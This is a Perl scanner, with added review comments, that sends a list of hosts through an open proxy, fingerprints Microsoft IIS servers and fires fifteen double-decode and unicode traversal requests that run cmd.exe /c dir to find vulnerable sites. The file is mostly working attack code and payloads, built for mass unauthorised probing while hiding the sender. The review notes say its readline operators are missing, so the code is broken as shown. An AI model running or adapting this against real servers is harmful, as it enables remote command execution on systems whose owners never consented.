#!/usr/bin/perl
#
# This program is based on the decodecheck written by Spidermark.
# It scans (using an OPEN PROXY) a LIST of sites and ONLY probes
# IIS servers (there's NO reason for checking APACHE and many others).
# If the site is not running IIS, it tells you what server it is and
# skeep to the next of the list (it saves a lot of time).
# It checks for the decode and the old unicode vulnerabilities.
#
# Renato Turini - renatoturini@uol.com.br
#
# NOTE(review): the script has no `use strict` / `use warnings`, so every
# variable below ($lista, $proxy, $port, $bounce, $flag, $target, $line,
# $uni) is a package global; sendraw() depends on $port and $bounce being
# set by the main loop rather than receiving them as arguments.
#
# NOTE(review): this listing appears to have lost its angle-bracket
# readline operators to HTML extraction -- `while ($target = )` and
# `while(){` below do not parse as written. Presumably `<FILE>` and `<S>`
# respectively; confirm against the original source before running.

# Selected handle is STDOUT here, so this unbuffers STDOUT (progress dots
# below are printed one at a time).
$|=1;

# Request paths sent to each IIS host. Each is a `..` traversal written
# with the encodings the header calls the "decode" (%255c) and "unicode"
# (%c0%af and friends) bugs, ending in `cmd.exe?/c+dir`; the main loop
# treats the word "Directory" in the reply as a hit.
@unis=(
    "/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
    "/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir",
    "/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir",
    "/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir",
    "/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir",
    "/_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir",
    "/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir");

use Socket;

# Three positional arguments: list file, proxy host, proxy port.
# $#ARGV<2 is true when fewer than three were given.
if ($#ARGV<2) {die "Usage: cool2 list proxy proxy_port\n";}
$lista =$ARGV[0];
# NOTE(review): @ARGV[1] / @ARGV[2] are one-element slices, not scalar
# element accesses; they happen to yield the element here but $ARGV[1]
# is the intended form and avoids the "scalar value better written as"
# warning under `use warnings`.
$proxy=@ARGV[1];
$port=@ARGV[2];

# NOTE(review): two-argument open takes the mode from the filename itself,
# so a list name beginning with '>' or ending in '|' would be interpreted
# as a write mode or a pipe. Three-argument open (FILE, '<', $lista) pins
# the mode to read-only.
open (FILE, "$lista")|| die "Can't open file: $!";

# One target host per line of the list file. (Readline operator is
# missing from this listing; see the note at the top.)
while ($target = ) {
    chomp($target);
    print "Testing $target\n";
    # Resolve the proxy address; sendraw() connects to $bounce:$port.
    # Done once per target rather than once per run.
    $bounce = inet_aton($proxy);
    # Per-target verdict: set to 1 when any probe reply contains
    # "Directory".
    $flag=0;
    # Fingerprint request through the proxy; only the Server header of
    # the reply is examined.
    my @iis=sendraw("GET http://$target/index HTTP/1.0\r\n\r\n");
    foreach $line (@iis){
        # Each element is one reply line, so ^ anchors at the line start.
        if ($line =~ /^Server/ && $line =~ /Microsoft-IIS/) {
            print "The site is running:\n";
            print "$line";
            print "let's check it out\n";
            foreach $uni (@unis){
                print ".";
                my @results=sendraw("GET http://$target$uni HTTP/1.0\r\n\r\n");
                # The inner loop reuses the global $line; foreach
                # localises it, so the outer $line is restored afterwards.
                foreach $line (@results){
                    # NOTE(review): unanchored match -- any reply line
                    # containing "Directory" (an error page using the
                    # word, for instance) presumably counts as a hit too.
                    if ($line =~ /Directory/) {print "Not safe:\n $uni\n"; $flag=1;}
                }
            }
            print "\n";
            if ($flag==1){print "Vulnerable\n\n";}
            else {print "Safe\n\n";}
        }
        else {
            # Any other Server header: report it and move on. Replies
            # without a Server header produce no output at all.
            if ($line =~ /^Server/){
                print "The site is running:\n";
                print "$line";
                print "skeeping...\n\n";
            }
        }
    }
}

# Sendraw - thanx RFP rfp@wiretrip.net
#
# Send one raw request string to the proxy at $bounce:$port (package
# globals set in the main loop) and return every line of the reply as a
# list. Dies if the socket cannot be created or the connect fails.
sub sendraw {
    # this saves the whole transaction anyway
    my ($pstr)=@_;
    # NOTE(review): S is a bareword (package-global) handle reopened on
    # every call; a lexical handle (my $sock) is the modern form.
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
    # Hand-packed sockaddr_in: 16-bit family (2, AF_INET on common
    # platforms), 16-bit big-endian port, 4-byte address, 8 bytes of
    # padding. Socket::sockaddr_in($port,$bounce) builds the same
    # structure portably.
    if(connect(S,pack "SnA4x8",2,$port,$bounce)){
        my @in;
        # Make S the default output handle and unbuffer it ($| applies to
        # the currently selected handle), so the bare print below goes to
        # the socket. STDOUT is reselected after the reply is read.
        select(S); $|=1;
        print $pstr;
        # Readline operator missing in the listing (presumably <S>);
        # collects the entire reply before closing.
        while(){ push @in, $_;}
        select(STDOUT);
        close(S);
        return @in;
    }
    else {
        die("Can't connect...\n");
    }
}